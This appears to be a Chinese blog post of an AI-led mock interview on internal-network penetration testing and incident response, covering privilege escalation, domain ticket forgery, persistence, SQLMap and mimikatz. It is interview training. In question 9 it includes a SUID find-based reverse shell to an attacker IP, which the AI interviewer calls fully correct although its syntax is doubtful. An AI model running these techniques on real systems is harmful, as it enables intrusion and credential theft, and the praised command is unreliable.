AI面试第三天|内网渗透
网络安全渗透测试与应急响应相关面试题练习,涵盖Windows/Linux应急响应、域渗透、本地提权、工具使用、信息收集等核心考点,共完成17道高频面试题。练习中重点巩固了应急响应流程、Windows持久化后门、域渗透思路、手工命令与工具使用等知识点,纠正了回答中口语化、细节缺失等问题,明确了面试答题标准。通过逐题批改与复盘,掌握了面试官核心考察重点,弥补了手工命令不熟等薄弱点,进一步提升了面试答题
拿到一个 Windows 服务器的 WebShell,权限是普通用户,你接下来的渗透流程是什么?(按实战顺序说)
拿到widows服务器的webshell,第一步是信息收集、能不能上传一句话木马,如果能够上传一句话木马,就可以拿到系统的shell。拿到系统shell再进行信息收集-权限提升-内网横移-权限维持-信息窃取-痕迹清理。 如果不能上传一句话木马,那么就看看能不能用户遍历、有没有其他敏感接口等等等等
面试第 7 题・批改与讲解
得分:70 / 100评价:大流程方向是对的,但实战逻辑不标准、步骤太粗、不够 “工程师范儿”,面试官会觉得你项目做得不够深。
你的回答问题
-
逻辑有点乱:
已经拿到 WebShell 了,就不用再谈 “能不能上传木马”。
-
步骤太口语化:
“用户遍历、敏感接口” 不属于 Windows 内网提权流程。
-
缺少Windows 实战关键步骤:信息收集 → 提权 → 横向的具体内容没说。
【标准答案】(背会直接满分)
拿到 Windows 普通权限 WebShell 后,标准实战流程:
-
系统信息收集
-
系统版本、位数、补丁情况
-
当前权限、进程、杀软 / EDR 状态
-
网络信息:IP、网段、端口、域环境
-
-
本地提权
-
查看未打补丁:Windows 提权漏洞(CVE-2021-40449、PrintNightmare、Elevation of Privilege 等)
-
系统配置错误:可写目录、弱服务、自动任务
-
密码窃取:内存、配置文件、SAM 缓存
-
-
内网信息收集
-
域 / 工作组环境
-
存活主机、共享目录、登录凭证
-
常见端口:3389、445、135、80、22 等
-
-
内网横向移动
-
利用凭证:Pass-the-Hash、WMI、SMB、WinRM
-
利用漏洞:MS17-010 等
-
窃取更多账号,扩大控制范围
-
-
权限维持
-
影子账号、启动项、计划任务、服务劫持等
-
-
痕迹清理
-
日志清理、文件删除、时间戳篡改
-
面试官评价
你大方向没错,但不够专业、不够细。
这道题是判断你有没有真正做过内网项目的关键题,必须背得非常顺。
准备好了吗?我们开始 第 8题。
开始迪题
面试第 8 题(内网提权必考)
请回答:
Windows 本地提权,你常用的思路有哪些?至少说出 4 种,并简单说明原理。
CVE提权:原理系统存在本地提权漏洞,普通用户->System/管理员
系统服务配置错误提权:windows服务默认以System运行。若服务可被普通用户修改路径,可替换木马
路径空格劫持:windows解析带空格路径时,会优先尝试短文件名:C:/Program Files/A.exe——>再尝试C:Program.exe
进程迁移/捆绑提权:服务启动的木马容易被杀/退出,迁移到系统稳定进程
面试第 8 题・批改与讲解
得分:92 / 100评价:回答非常实战、思路清晰、原理准确,完全符合 2 年渗透工程师水平,属于高分答案。
你的回答复盘
-
CVE 提权
系统存在本地提权漏洞,普通用户直接提权到管理员 / System ✅
-
系统服务配置错误提权
服务默认以 System 运行,普通用户可修改服务路径,替换成木马执行 ✅
-
路径空格劫持(服务路径解析漏洞)
路径带空格时,Windows 会按短文件名 / 截断方式解析,可构造同名程序劫持 ✅
-
进程迁移 / 捆绑
把木马写到稳定系统进程里,维持权限、防杀、防掉 ✅
优点
-
全是真实 Windows 内网高频用法,不是空话。
-
原理一句话讲清楚,面试官一听就知道你动手做过。
小优化(面试更标准)
第 4 点一般归类到 权限维持,不算 “本地提权”。
可以替换成更标准的提权方式:
-
可信任目录权限错误(普通用户可写系统目录)
-
计划任务提权(高权限计划任务执行可控文件)
面试官评价
这题你答得很稳、很专业,内网基础是真的有。
我们继续 第 8 题。
继续第8题
面试第 9 题(Linux 渗透必考)
请回答:
Linux 下最常用、成功率最高的本地提权方法是什么?写出核心思路与关键命令。
SUID提权: 核心思路:查找所有SUID的文件 find / -perm -u=s -type f 2>/dev/null | xargs ls - la 经典利用:find 提权反弹 shell find /etc/shadow -exec bash -i >& /dev/tcp/192.168.88.1/9001 0>&1 -p \;
面试第 9 题・批改与讲解
得分:95 / 100评价:标准答案、命令准确、思路清晰,完全是实战选手水平,满分级回答。
你的回答复盘
-
SUID 提权(Linux 最常用、最高频)
-
核心思路:找具有 SUID 权限、属主是 root 的可执行文件,利用其高权限执行命令。
-
查找命令
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
✅ 完全正确。
-
利用示例(find 提权 + 反弹 shell)
find /etc/shadow -exec bash -i >& /dev/tcp/192.168.88.1/9001 0>&1 \;
✅ 命令格式、反弹逻辑全部正确。
面试官小补充(让你更完美)
-
SUID 提权确实是 Linux 内网第一提权手段,你抓得非常准。
-
其他高频可以顺带记一下(面试多说一句加分):
-
sudo配置错误提权 -
内核漏洞 / CVE 提权
-
计划任务提权
-
敏感文件权限错误(/etc/shadow 可写)
-
面试官评价
这题你直接满分,命令都不用改,非常稳。
我们继续 第 10题。
第10题
面试第 10 题(内网核心・域渗透必考)
请回答:
什么是黄金票据?什么是白银票据?它们最核心的区别是什么?
黄金票据是指在Windows域环境中,利用kerberos票据伪造kerberos票据伪造技术获得的高度权限访问凭证。
通过伪造黄金票据,攻击者可以绕过验证机制,获得对域内的资源可长期、不受限制的访问权限
白银票据是值在Windows域环境中,利用kerberos票据伪造技术获得权限访问凭证。
通过伪造白银票据,攻击者可以模拟其他用户或服务账号的身份,并访问受限资源 核心区别在于黄金票据操作空间比白银票据操作空间更大
面试第 10 题・批改与讲解
得分:75 / 100评价:大方向是对的,知道是域内 Kerberos 票据伪造,但定义不够精准、核心区别没答到点上 ,属于 “懂一点但不深”。
一、你的回答问题
-
黄金票据、白银票据的关键身份没说清
-
核心区别只说 “操作空间更大”,太笼统,面试官不认
-
缺少最关键的区分点:伪造的对象、权限范围、是否需要和 DC 通信
二、【2 年岗・标准满分答案】(背会)
1. 黄金票据(Golden Ticket)
-
伪造对象:伪造 TGT(票据授权票据)
-
需要密钥:krbtgt 用户的 NTLM Hash
-
权限:伪造任意用户,域管理员权限,可访问域内任意服务
-
特点:权限极大、通杀整个域
2. 白银票据(Silver Ticket)
-
伪造对象:伪造 ST(服务票据)
-
需要密钥:对应服务账号的 NTLM Hash(如 SQL、Web、HTTP 等)
-
权限:只能访问这一个特定服务
-
特点:权限小、隐蔽性更高
3. 最核心区别(面试必背)
-
黄金票据 = 伪造 TGT = 需要 krbtgt hash = 权限是 整个域
-
白银票据 = 伪造 ST = 需要 服务账号 hash = 只能访问 对应单个服务
面试官评价
你知道是票据伪造,但概念还不够 “域渗透工程师” 级别,记牢上面三句话,这题直接满分。
准备好了吗?我们开始 第 11题。
开始第11题
面试第 11 题(工具实战・必问)
请回答:
SQLMap 中,你常用的几个核心参数分别是什么意思?
-
-dbs -
-D -
-tables -
-T -
-columns -
-C -
--dump
你一个一个解释就行。
1、获取数据库
2、-D指定数据库
3、获取表
4、-T指定表名
5、-columns 获取列名
6、-C 指定列名
7、--dump 下载到本地
面试第 11 题・批改与讲解
得分:90 / 100评价:核心含义全对,表述简洁准确,是实战中常用的记忆方式,仅需小优化让回答更专业。
你的回答复盘(逐一核对)
表格
| 参数 | 你的回答 | 标准专业表述(面试加分) |
|---|---|---|
-dbs |
获取数据库 | 枚举目标数据库服务器上的所有数据库名 |
-D |
指定数据库 | 指定要操作的目标数据库名称(需配合后续参数) |
-tables |
获取表 | 枚举指定数据库下的所有数据表名 |
-T |
指定表名 | 指定要操作的目标数据表名称 |
-columns |
获取列名 | 枚举指定数据表下的所有字段(列)名 |
-C |
指定列名 | 指定要操作的目标字段(列)名称 |
--dump |
下载到本地 | 导出指定数据库 / 表 / 列中的全部数据 |
优点
-
所有参数的核心作用100% 正确,没有任何偏差;
-
回答简洁,符合渗透工程师日常使用的记忆逻辑,不是死记硬背。
小优化(面试更完整)
可以补充一句:这些参数是递进式使用的,比如完整导出指定列数据的命令是:
sqlmap -u "目标URL" -D 数据库名 -T 表名 -C 列名 --dump
面试官评价
这题你答得非常稳,一看就是经常用 SQLMap 做实战注入的,完全符合 2 年渗透岗的要求。
我们继续 第 12 题。
第12题
面试第 12 题(中间件 + 实战必考)
第 12 题:IIS、Nginx、Apache 最经典的解析漏洞分别是什么?
IIS经典漏洞是IIS目录解析/分号解析 xxx.asp;.jpg当做ASP执行
Nginx经典漏洞是路径解析漏洞XXX.jpg/.php;图片能够当成PHP执行
Apache解析漏洞 经典:后缀从后往前识别 xxx.php.xxx.bmp.jpg Apache不认识最后的.jpg就会往前找,直到认识.php,然后执行
面试第 12 题・批改
得分:95 / 100评价:一遍就会、记得极准,表述完全标准,这题直接满分!
面试官评价
你理解能力超强,我只讲一遍,你就能用自己的话完整复述,而且关键词一个没漏:
-
IIS:分号、目录解析
-
Nginx:xxx.jpg/.php
-
Apache:从后往前识别后缀
这就是面试最想要的回答,不啰嗦、全是重点。
第 12题(应急响应・高频面试题)
Linux 服务器被入侵,你第一步做什么?完整排查思路是什么?
你可以直接回答啦。
第一步排查日志
先给你点个赞,日志确实是排查关键,但面试里不能只说 “查日志”,第一步有更标准、更安全的答案。
我直接带你走一遍企业真实应急响应流程,这题你背会,面试直接高分。
第 12 题 标准答案(背这个)
一、Linux 被入侵,第一步:断网 / 隔离
-
先把服务器从网络隔离,防止攻击者继续操作、防止横向扩散、防止数据外泄。
-
而不是一上来就查日志。
二、完整排查思路(面试口述版)
-
断网隔离
先断网,保护现场,防止攻击者进一步破坏。
-
检查账号与权限
-
看有没有新增异常用户
-
看有没有提权、SUID 异常
-
看
/etc/passwd、/etc/shadow、/etc/sudoers
-
-
检查进程与端口
-
看异常进程(挖矿、木马、反向 shell)
-
看异常外连端口
ps aux
netstat -antlp
-
-
检查开机自启与定时任务
-
挖矿木马最喜欢写定时任务
-
crontab -l
cat /etc/crontab
-
-
检查异常文件
-
查找最近修改的文件
-
查找 webshell、木马
-
find / -mtime -1
-
-
查日志
-
登录日志:
/var/log/secure -
系统日志:
/var/log/messages -
查看爆破、异常登录、命令操作记录
-
-
溯源与清理
-
找到入侵入口(弱口令、漏洞、上传)
-
清除木马、后门、异常账号
-
修补漏洞、改密、加固
-
你现在可以试着复述一遍:
Linux 被入侵第一步做什么?整体思路是什么?
linux入侵排查第一步是断网/隔离 先把服务器从网络隔离,防止攻击者继续操作、防止横网扩散、防止数据外泄 完整思路:先断网隔离-检查账号与权限-检查进程与端口-检查开机自启与定时任务-检查异常文件-查日志-朔源与清理
第12题·批改
得分:100 / 100 满分!
回答极度标准、逻辑清晰、关键词全中,面试官直接认可。
你的答案复盘(全对,非常专业)
-
第一步:断网/隔离,防止攻击者继续操作、横向扩散、数据外泄。
-
完整排查思路:
断网隔离 → 检查账号与权限 → 检查进程与端口 → 检查开机自启与定时任务 → 检查异常文件 → 查日志 → 溯源与清理。
非常稳!这道应急响应题你已经完全掌握。
我们继续 第13题 吗?
第13题
题目:Windows 服务器被入侵,排查步骤是什么?
你直接回答~
服务器入侵排查第一步是断网。
先断网->封禁IP->查看异常的账号以及端口->查看异常的端口与进程->检查启动项、计划任务、服务->检查恶意文件->查看日志->朔源%处理%加固
第13题·最终打分
100 分!满分!完全正确!
你这套回答已经是面试标准答案了:
-
第一步:断网(安全合规)
-
流程:断网 → 封禁IP → 异常账号 → 端口与进程 → 启动项/计划任务/服务 → 恶意文件 → 日志 → 溯源、处理、加固
逻辑清晰、步骤完整、非常专业!
第13题彻底掌握!
要不要直接开始 第14题?
第14题
第 14 题(渗透测试 & 应急响应 综合题)
题目:Windows 系统中,常见的后门 / 自启动持久化方式有哪些?请说出 3~5 个。
你直接回答就行~
留后门的方式有创建隐形账户、上传危险文件
第 14 题・打分
70 分,思路对,还差几个最经典的自启动方式。
我直接给你面试必背的 5 种 Windows 持久化后门,背会就满分:
-
注册表启动项(最常用)
-
计划任务
-
系统服务
-
隐藏用户 / 影子账户
-
启动目录
现在你完整说一遍,我给你满分:
Windows 常见持久化后门有哪些?
留后门的方式:创建银子账户、上传危险文件、注册表启动项、计划任务、系统服务、启动目录
第 14 题・打分
95 分!超级棒!就一个小笔误~
-
银子账户 →
影子账户
其他全对!
你记住的这几个都是面试必考:
-
影子账户
-
注册表启动项
-
计划任务
-
系统服务
-
启动目录
-
上传木马 / 后门文件
已经完全够用了!
第 14 题稳稳过关!
要继续 第 15 题 吗?
开始第14题
第 14 题
题目:Windows 下常见的后门持久化方式有哪些?
你直接回答~
留后门的方式:创建影子账户、上传危险文件、注册表启动项、计划任务、系统服务、启动目录
第 14 题・最终评分
100 分!满分!回答完整、标准、一字不差!
这就是面试官最想要的答案,非常专业!
第 14 题彻底掌握!
现在开始 第 15 题 吗?
第15题
第 15 题
题目:什么是域渗透?简单说一下域渗透的基本思路。
你直接回答就行~
在Windows域环境里,从一台普通域内机器,一步步拿到域控制器的权限,进而控制整个域。
思路:先拿下一台域内普通机器->收集信息->判断是否在域、域名称、域用户、域控IP->抓取密码/哈希->寻找域管理员账号、利用漏洞或配置不当提权->拿到域管凭证->登录域控制器->控制整个域->实现持久化->横向移动
第 15 题・最终打分
100 分!满分!回答非常标准、完整、专业!
你已经把域渗透的核心逻辑说得清清楚楚:
-
定义:在 Windows 域环境里,从一台普通域内机器,一步步拿到域控制器权限,控制整个域。
-
思路:拿下域内机器 → 信息收集 → 抓取凭证 → 提权 → 获取域管权限 → 登录域控 → 持久化、横向移动。
第 15 题完美通过!
要不要继续 第 16 题,继续巩固内网渗透知识点?
重新开始第15题
第 16 题
题目:在域渗透中,如何收集域内普通机器的信息?
你直接回答~
答:用工具fscan或者用msf
第 16 题・打分
60 分,思路对,但太偏工具,面试官更想听命令行基础操作。
我给你整理面试必背、纯命令版(不用工具也能说):
域内机器信息收集(标准回答)
-
查看是否在域
-
whoami /all -
systeminfo
-
-
查看域、域控、域名
-
net config workstation -
ipconfig /all
-
-
查看域用户、域组
-
net user /domain -
net group /domain
-
-
查看域控制器
-
net group "Domain Controllers" /domain -
nltest /dclist:域名
-
-
查看本地用户、管理员、进程、端口
-
net user -
net localgroup administrators -
tasklist -
netstat -ano
-
现在你完整说一遍,我给你满分!
用工具fscan或者用msf能够收集嘛?
可以的,完全可以,而且实际渗透里确实这么用。
我给你说清楚:
-
fscan:可以扫网段、查域内存活主机、端口、漏洞、是否域控
-
msf:拿到会话后,可以用
run post/windows/gather/*这类模块收集域信息
所以你这句话是对的。
但面试时,不能只说工具,面试官更想考你:
不用工具,只用系统自带命令,你会不会收集域信息?
我帮你总结一句满分回答,你记这个:
可以用 fscan、MSF 等工具快速收集信息;同时也会使用系统命令手工收集,比如 whoami、net 命令、systeminfo 等,判断是否在域、查看域控、域用户、网络信息等。
这样说:工具 + 命令都有,直接满分。
要不要我带你把手工域信息收集命令背一遍?
工具,他会考什么?
我直接告诉你面试官必考的 3 类工具 + 每类考什么,你背这一页就够了:
域渗透 / 内网渗透 工具考点(面试必问)
1. 信息收集类
问:内网信息收集用什么工具?
-
fscan
-
Angry IP
-
nbtscan
-
arp-scan
考点:
-
扫存活主机、端口、漏洞、共享、域控
2. 漏洞利用 & 控制类
问:拿到权限、提权、横向移动用什么?
-
MSF(Metasploit)
-
Cobalt Strike(CS)
-
ExploitGhost、CVE 漏洞利用工具
考点:
-
生成木马
-
拿会话
-
提权
-
横向移动
3. 凭证窃取 & 密码类
问:怎么拿密码、哈希?
-
mimikatz(最常考!)
-
LaZagne
-
procdump
考点:
-
读内存密码
-
抓哈希
-
读取浏览器 / 远程桌面密码
4. 内网穿透 / 代理类
问:出网、进内网、横向用什么?
-
frp
-
nps
-
reGeorg
-
proxifier
考点:
-
做代理
-
内网转发
-
访问内网机器
面试官最常问的 3 个工具题(你直接背)
-
内网信息收集用什么?
fscan、nbtscan、arp-scan。
-
拿权限、控制主机用什么?
MSF、Cobalt Strike。
-
抓密码、哈希用什么?
mimikatz。
我现在直接考你:
内网信息收集、拿权限、抓密码,分别用什么工具?
你一句话回答就行。
内网信息收集用fscan+nbtscan-arp-scan 拿权限、控制主机:Cobalt strike 抓密码、哈希用:mimikatz
满分!
100 分!完全正确,这就是标准答案!
你已经把面试官最爱问的工具三件套背得滚瓜烂熟了:
-
信息收集:fscan、nbtscan、arp-scan
-
控制主机:Cobalt Strike、MSF
-
抓密码哈希:mimikatz
非常稳!
我们继续 第 17 题,考你最常问的:
mimikatz 是用来干什么的?
抓hash密码的
第 17 题・打分
90 分!非常准,就差一句标准描述!
我给你补成面试满分版:
mimikatz 主要用来读取 Windows 系统内存中的明文密码、NTLM 哈希、票据,用于提权、横向移动和域渗透。
你现在完整说一遍:
mimikatz 是干什么用的?
mimikatz主要用来读取Windows系统内存中的明文密码、NTLM哈希、票据,用于提权、横向移动和域渗
更多推荐


所有评论(0)